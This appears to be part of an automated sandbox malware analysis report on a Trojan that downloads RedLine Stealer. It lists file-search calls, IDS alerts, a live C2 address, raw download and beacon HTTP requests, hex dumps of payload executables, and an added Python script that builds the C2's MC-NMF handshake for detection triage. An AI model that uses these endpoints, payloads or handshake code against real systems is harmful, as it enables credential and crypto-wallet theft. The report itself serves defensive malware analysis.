Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9466F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 0_2_00007FF6CF9466F0
Source: C:\Windows\explorer.exe Code function: 3_2_11056AE0 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA, 3_2_11056AE0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 4_2_00007FF6BCCA66F0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA666F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 5_2_00007FF78FA666F0
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B66F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 9_2_00007FF7A34B66F0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 10_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E985A0 FindFirstFileExW,FindClose, 10_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 10_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E985A0 FindFirstFileExW,FindClose, 12_2_00007FF779E985A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 12_2_00007FF779E979B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 12_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8342DFC FindFirstFileExW, 12_2_00007FF8B8342DFC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836EFEC FindFirstFileExW,FindClose,FindNextFileW, 12_2_00007FF8B836EFEC
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F5566F0 SHGetFolderPathW,FindFirstFileW,FindNextFileW, 13_2_00007FF67F5566F0
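The configuration extracted above gives the C2 as a bare host:port (176.111.174.140:1912) plus an Authorization value. RedLine's C2 channel is a WCF net.tcp endpoint, and every net.tcp connection opens with the MC-NMF (.NET Message Framing, MS-NMF) preamble, which is why the Suricata rules in the Networking section name MC-NMF. The code below is an added example, not sandbox output: it builds and parses that preamble from the MS-NMF record layout and applies the triage checks a network detection would. The bytes are constructed from the spec and the configured C2 address, not captured traffic; the record type and mode values are from MS-NMF section 2.2.3.

```python
"""MC-NMF (.NET Message Framing, MS-NMF) preamble builder, parser and triage.
Constructed bytes, not captured traffic."""
import re
from urllib.parse import urlsplit

# Record types, MS-NMF section 2.2.3
VERSION, MODE, VIA, KNOWN_ENCODING = 0x00, 0x01, 0x02, 0x03
SIZED_ENVELOPE, END, PREAMBLE_ACK, PREAMBLE_END = 0x06, 0x07, 0x0B, 0x0C
MODES = {0x01: "SingletonUnsized", 0x02: "Duplex", 0x03: "Simplex", 0x04: "SingletonSized"}
ENCODINGS = {0x00: "UTF8/SOAP1.1", 0x03: "UTF8/SOAP1.2", 0x07: "Binary",
             0x08: "Binary+InBandDictionary"}
NET_TCP_DEFAULT_PORT = 808  # WCF's default net.tcp port (Net.Tcp Port Sharing Service)


def encode_size(n: int) -> bytes:
    """MS-NMF variable-length size: 7 bits per byte, low group first, MSB = more."""
    out = bytearray()
    while True:
        group, n = n & 0x7F, n >> 7
        out.append(group | 0x80 if n else group)
        if not n:
            return bytes(out)


def decode_size(data: bytes, pos: int):
    """Inverse of encode_size; returns (value, position after the field)."""
    value, shift = 0, 0
    for i in range(5):  # the spec caps the field at five bytes
        b = data[pos + i]
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos + i + 1
        shift += 7
    raise ValueError("size field longer than five bytes")


def build_preamble(via: str, mode: int = 0x02, encoding: int = 0x08) -> bytes:
    """Client side of the handshake: Version 1.0, Mode, Via, KnownEncoding, PreambleEnd."""
    via_bytes = via.encode("utf-8")
    return (bytes([VERSION, 1, 0]) + bytes([MODE, mode])
            + bytes([VIA]) + encode_size(len(via_bytes)) + via_bytes
            + bytes([KNOWN_ENCODING, encoding]) + bytes([PREAMBLE_END]))


def parse_preamble(data: bytes) -> dict:
    """Walk records up to PreambleEnd; any other record there is a protocol error."""
    pos, out = 0, {}
    while pos < len(data):
        rtype, pos = data[pos], pos + 1
        if rtype == VERSION:
            out["version"], pos = (data[pos], data[pos + 1]), pos + 2
        elif rtype == MODE:
            out["mode"], pos = MODES.get(data[pos], f"unknown(0x{data[pos]:02x})"), pos + 1
        elif rtype == VIA:
            n, pos = decode_size(data, pos)
            out["via"], pos = data[pos:pos + n].decode("utf-8"), pos + n
        elif rtype == KNOWN_ENCODING:
            out["encoding"], pos = ENCODINGS.get(data[pos], f"unknown(0x{data[pos]:02x})"), pos + 1
        elif rtype == PREAMBLE_END:
            return out
        else:
            raise ValueError(f"unexpected record 0x{rtype:02x} at offset {pos - 1}")
    raise ValueError("truncated preamble")


def assess(pre: dict) -> list:
    """Triage a parsed preamble the way a network detection would."""
    findings = []
    u = urlsplit(pre.get("via", ""))
    if u.scheme != "net.tcp":
        findings.append(f"unexpected scheme {u.scheme!r}")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", u.hostname or ""):
        findings.append(f"literal IP in Via: {u.hostname}")
    if u.port not in (None, NET_TCP_DEFAULT_PORT):
        findings.append(f"non-default net.tcp port: {u.port}")
    if pre.get("mode") == "Duplex":
        findings.append("duplex session: server can push messages to the client")
    return findings


# Constructed client preamble for the C2 endpoint in the extracted configuration;
# the server answers with a single PreambleAck byte before envelopes flow.
C2_PREAMBLE = build_preamble("net.tcp://176.111.174.140:1912/")
SERVER_ACK = bytes([PREAMBLE_ACK])

if __name__ == "__main__":
    print(C2_PREAMBLE.hex(" "))
    pre = parse_preamble(C2_PREAMBLE)
    print(pre, assess(pre))
```

The preamble is plaintext even when the envelopes that follow are .NET binary XML, so the Via string (scheme, host, port) and the Duplex mode are visible to any sensor on the path; that is the part the ET rules key on, and the Authorization value from the configuration only appears inside the sized envelopes after the server's PreambleAck.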

Networking

Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:49709 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49786 -> 176.111.174.140:1912
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49786 -> 176.111.174.140:1912
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 176.111.174.140:1912 -> 192.168.2.5:49786
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 176.111.174.140:1912 -> 192.168.2.5:49786
Source: C:\Windows\explorer.exe Network Connect: 176.111.174.140 80
Source: Malware configuration extractor URLs: 176.111.174.140:1912
Source: global traffic TCP traffic: 192.168.2.5:49711 -> 176.111.174.140:1912
Source: global traffic HTTP traffic detected (response 1):
  HTTP/1.1 200 OK
  Date: Sat, 19 Oct 2024 12:03:09 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  Last-Modified: Fri, 18 Oct 2024 18:22:37 GMT
  ETag: "3d600-624c4633f8951"
  Accept-Ranges: bytes
  Content-Length: 251392
  Content-Type: application/octet-stream
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8c d6 90 63 c8 b7 fe 30 c8 b7 fe 30 c8 b7 fe 30 0c 72 30 30 9e b7 fe 30 0c 72 33 30 c1 b7 fe 30 c8 b7 ff 30 5a b7 fe 30 34 c0 47 30 c7 b7 fe 30 0c 72 31 30 ee b7 fe 30 34 c0 42 30 c9 b7 fe 30 ef 71 2d 30 c1 b7 fe 30 ef 71 34 30 c9 b7 fe 30 ef 71 32 30 c9 b7 fe 30 52 69 63 68 c8 b7 fe 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 6d a7 12 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 e4 00 00 00 16 03 00 00 00 00 00 e0 45 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 68 01 00 57 00 00 00 f4 59 01 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 b0 0d 00 00 00 00 00 00 00 00 00 00 00 10 04 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 42 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 e2 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 87 68 00 00 00 00 01 00 00 6a 00 
  00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 8e 02 00 00 70 01 00 00 68 02 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 b0 0d 00 00 00 00 04 00 00 0e 00 00 00 ba 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a0 0d 00 00 00 10 04 00 00 0e 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected (response 2):
  HTTP/1.1 200 OK
  Date: Sat, 19 Oct 2024 12:03:14 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  Last-Modified: Fri, 18 Oct 2024 21:56:05 GMT
  ETag: "47400-624c75ea5eea6"
  Accept-Ranges: bytes
  Content-Length: 291840
  Content-Type: application/octet-stream
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 4b e0 d8 65 2a 8e 8b 65 2a 8e 8b 65 2a 8e 8b 65 2a 8f 8b 1a 2a 8e 8b 99 5d 37 8b 62 2a 8e 8b a1 ef 43 8b 6f 2a 8e 8b a1 ef 41 8b 5a 2a 8e 8b a1 ef 40 8b d4 2a 8e 8b 42 ec 40 8b 60 2a 8e 8b 42 ec 41 8b 70 2a 8e 8b 42 ec 44 8b 64 2a 8e 8b 42 ec 47 8b 64 2a 8e 8b 42 ec 42 8b 64 2a 8e 8b 52 69 63 68 65 2a 8e 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 75 d9 12 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 0c 03 00 00 0a 02 00 00 00 00 00 40 e9 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 fd 03 00 56 00 00 00 f4 f1 03 00 50 00 00 00 00 10 05 00 88 02 00 00 00 d0 04 00 34 32 00 00 00 00 00 00 00 00 00 00 00 20 05 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a4 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 0a 03 00 00 10 00 00 00 0c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 de 00 
00 00 20 03 00 00 e0 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 cc 00 00 00 00 04 00 00 28 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 34 32 00 00 00 d0 04 00 00 34 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 88 02 00 00 00 10 05 00 00 04 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3e 22 00 00 00 20 05 00 00 24 00 00 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Oct 2024 12:03:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 18 Oct 2024 19:00:38 GMTETag: "4b200-624c4eb378792"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 9e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 2c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Oct 2024 12:03:23 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 17 Oct 2024 20:47:45 GMTETag: "59215b-624b24c711d7d"Accept-Ranges: bytesContent-Length: 5841243Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f1 77 11 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 a7 25 59 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 
74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox View IP Address: 176.111.174.140 176.111.174.140
Source: Joe Sandbox View ASN Name: WILWAWPL WILWAWPL
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49705 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49704 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49709 -> 176.111.174.140:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49710 -> 176.111.174.140:80
Source: global traffic HTTP traffic detected: GET /api/loader.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3
Host: 176.111.174.140
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /api/bot64.bin HTTP/1.1
User-Agent: Mozilla/5.0
Host: 176.111.174.140
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1
Host: 176.111.174.140
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1
Host: 176.111.174.140
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 43
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1
Host: 176.111.174.140
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Source: global traffic HTTP traffic detected: GET /x.exe HTTP/1.1
Host: 176.111.174.140
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: GET /zx.exe HTTP/1.1
Host: 176.111.174.140
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
